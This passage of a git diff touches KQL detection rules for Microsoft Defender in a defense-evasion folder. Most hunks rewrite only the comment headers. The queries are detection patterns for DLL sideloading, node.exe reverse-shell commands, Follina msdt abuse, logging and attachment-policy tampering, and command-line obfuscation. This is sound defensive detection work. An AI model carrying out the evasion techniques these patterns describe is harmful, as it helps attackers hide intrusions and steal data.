 | where (FolderPath endswith "\\log.dll" and (not(((FolderPath in~ ("C:\\Program Files\\AVAST Software\\Avast\\log.dll", "C:\\Program Files (x86)\\AVAST Software\\Avast\\log.dll")) or (FolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\log.dll", "C:\\Program Files (x86)\\AVG\\Antivirus\\log.dll")) or (FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not(((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\") or (FolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\" or FolderPath startswith "C:\\Program Files (x86)\\AVG\\Antivirus\\"))))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith 
"C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
index 166c86b8..fcd1f49d 100644
--- a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
@@ -1,13 +1,13 @@
-// Title: Potential Application Whitelisting Bypass via Dnx.EXE
-// Author: Beyu Denis, oscd.community
-// Date: 2019-10-26
-// Level: medium
-// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
-// Attackers might abuse this in order to bypass application whitelisting.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.t1027.004
-// False Positives:
-// - Legitimate use of dnx.exe by legitimate user
-
-DeviceProcessEvents
+// Title: Potential Application Whitelisting Bypass via Dnx.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
+// Attackers might abuse this in order to bypass application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1027.004
+// False Positives:
+// - Legitimate use of dnx.exe by legitimate user
+
+DeviceProcessEvents
 | where FolderPath endswith "\\dnx.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql b/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql
index e8a90e17..d951c614 100644
--- a/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Arbitrary Code Execution Via Node.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-09
-// Level: high
-// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Arbitrary Code Execution Via Node.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql b/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql
index b3971eb4..1af58858 100644
--- a/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential Arbitrary Command Execution Using Msdt.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-05-29
-// Level: high
-// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Potential Arbitrary Command Execution Using Msdt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-29
+// Level: high
+// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql b/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql
index 3839334e..05f7e90e 100644
--- a/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql
+++ b/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql
@@ -1,10 +1,10 @@
-// Title: Potential Arbitrary DLL Load Using Winword
-// Author: Victor Sergeev, oscd.community
-// Date: 2020-10-09
-// Level: medium
-// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Potential Arbitrary DLL Load Using Winword
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql b/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql
index 391e2400..c9a15cd8 100644
--- a/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql
+++ b/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql
@@ -1,10 +1,10 @@
-// Title: Potential Arbitrary File Download Using Office Application
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2022-05-17
-// Level: high
-// Description: Detects potential arbitrary file download using a Microsoft Office application
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Potential Arbitrary File Download Using Office Application
+// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
+// Date: 2022-05-17
+// Level: high
+// Description: Detects potential arbitrary file download using a Microsoft Office application
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql
index 8c9a2ba9..e9eb483b 100644
--- a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql
+++ b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql
@@ -1,12 +1,12 @@
-// Title: Potential Attachment Manager Settings Associations Tamper
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-01
-// Level: high
-// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potential Attachment Manager Settings Associations Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations*" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql
index cfa6d3e8..97a36539 100644
--- a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql
+++ b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql
@@ -1,12 +1,12 @@
-// Title: Potential Attachment Manager Settings Attachments Tamper
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-01
-// Level: high
-// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potential Attachment Manager Settings Attachments Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql b/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql
index 370a54d4..2a25463c 100644
--- a/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql
+++ b/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql
@@ -1,10 +1,10 @@
-// Title: Potential AutoLogger Sessions Tampering
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-01
-// Level: high
-// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceRegistryEvents
+// Title: Potential AutoLogger Sessions Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\System\\CurrentControlSet\\Control\\WMI\\Autologger*" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\") and (RegistryKey endswith "\\DefenderApiLogger*" or RegistryKey endswith "\\DefenderAuditLogger*")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
index ccc28b9a..2dc301ff 100644
--- a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
+++ b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
@@ -1,10 +1,10 @@
-// Title: Potential Base64 Decoded From Images
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-12-20
-// Level: high
-// Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140
-
-DeviceProcessEvents
+// Title: Potential Base64 Decoded From Images
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: high
+// Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "base64" and ProcessCommandLine contains "-d" and ProcessCommandLine contains ">") and (ProcessCommandLine contains ".avif" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jfif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".pjp" or ProcessCommandLine contains ".pjpeg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".webp") and FolderPath endswith "/bash" and (ProcessCommandLine contains "tail" and ProcessCommandLine contains "-c")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql b/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
index 9357a925..abf1edc8 100644
--- a/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Binary Proxy Execution Via VSDiagnostics.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-03
-// Level: medium
-// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate usage for tracing and diagnostics purposes
-
-DeviceProcessEvents
+// Title: Potential Binary Proxy Execution Via VSDiagnostics.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage for tracing and diagnostics purposes
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql
index e87c0fb8..ba4caee4 100644
--- a/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql
+++ b/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential CCleanerDU.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-07-13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - False positives could occur from other custom installation paths. Apply additional filters accordingly.
-
-DeviceImageLoadEvents
+// Title: Potential CCleanerDU.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives could occur from other custom installation paths. Apply additional filters accordingly.
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql
index c64e73bf..0236ab9d 100644
--- a/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql
+++ b/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential CCleanerReactivator.DLL Sideloading
-// Author: X__Junior
-// Date: 2023-07-13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - False positives could occur from other custom installation paths. Apply additional filters accordingly.
-
-DeviceImageLoadEvents
+// Title: Potential CCleanerReactivator.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives could occur from other custom installation paths. Apply additional filters accordingly.
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql
index 6b0ed7b2..cbfbe203 100644
--- a/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql
+++ b/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql
@@ -1,10 +1,10 @@
-// Title: Potential Chrome Frame Helper DLL Sideloading
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022-08-17
-// Level: medium
-// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential Chrome Frame Helper DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql b/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql
index 46ae6352..7a92d063 100644
--- a/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql
+++ b/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql
@@ -1,13 +1,13 @@
-// Title: Potential Command Line Path Traversal Evasion Attempt
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-10-26
-// Level: medium
-// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-// False Positives:
-// - Google Drive
-// - Citrix
-
-DeviceProcessEvents
+// Title: Potential Command Line Path Traversal Evasion Attempt
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-10-26
+// Level: medium
+// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Google Drive
+// - Citrix
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql
index c7bff6f6..b45535bc 100644
--- a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql
+++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql
@@ -1,10 +1,10 @@
-// Title: Potential Commandline Obfuscation Using Escape Characters
-// Author: juju4
-// Date: 2018-12-11
-// Level: medium
-// Description: Detects potential commandline obfuscation using known escape characters
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140
-
-DeviceProcessEvents
+// Title: Potential Commandline Obfuscation Using Escape Characters
+// Author: juju4
+// Date: 2018-12-11
+// Level: medium
+// Description: Detects potential commandline obfuscation using known escape characters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
index c7cb25b5..b533fb41 100644
--- a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
+++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
@@ -1,11 +1,11 @@
-// Title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image
-// Author: frack113, Florian Roth (Nextron Systems), Josh Nickels
-// Date: 2024-09-02
-// Level: high
-// Description: Detects potential commandline obfuscation using unicode characters.
-// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image
+// Author: frack113, Florian Roth (Nextron Systems), Josh Nickels
+// Date: 2024-09-02
+// Level: high
+// Description: Detects potential commandline obfuscation using unicode characters.
+// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and (ProcessVersionInfoOriginalFileName in~ ("Cmd.EXE", "cscript.exe", "PowerShell.EXE", "PowerShell_ISE.EXE", "pwsh.dll", "wscript.exe"))) and (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" or ProcessCommandLine contains "⠀")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql b/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql
index e7be3eef..5da0b829 100644
--- a/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql
+++ b/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql
@@ -1,10 +1,10 @@
-// Title: Potential Data Stealing Via Chromium Headless Debugging
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-23
-// Level: high
-// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.credential-access, attack.collection, attack.t1185, attack.t1564.003
-
-DeviceProcessEvents
+// Title: Potential Data Stealing Via Chromium Headless Debugging
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-23
+// Level: high
+// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.collection, attack.t1185, attack.t1564.003
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
index d840a792..79e8d350 100644
--- a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql 
@@ -1,10 +1,10 @@
-// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
-// Author: @Kostastsale, TheDFIRReport
-// Date: 2022-12-05
-// Level: high
-// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
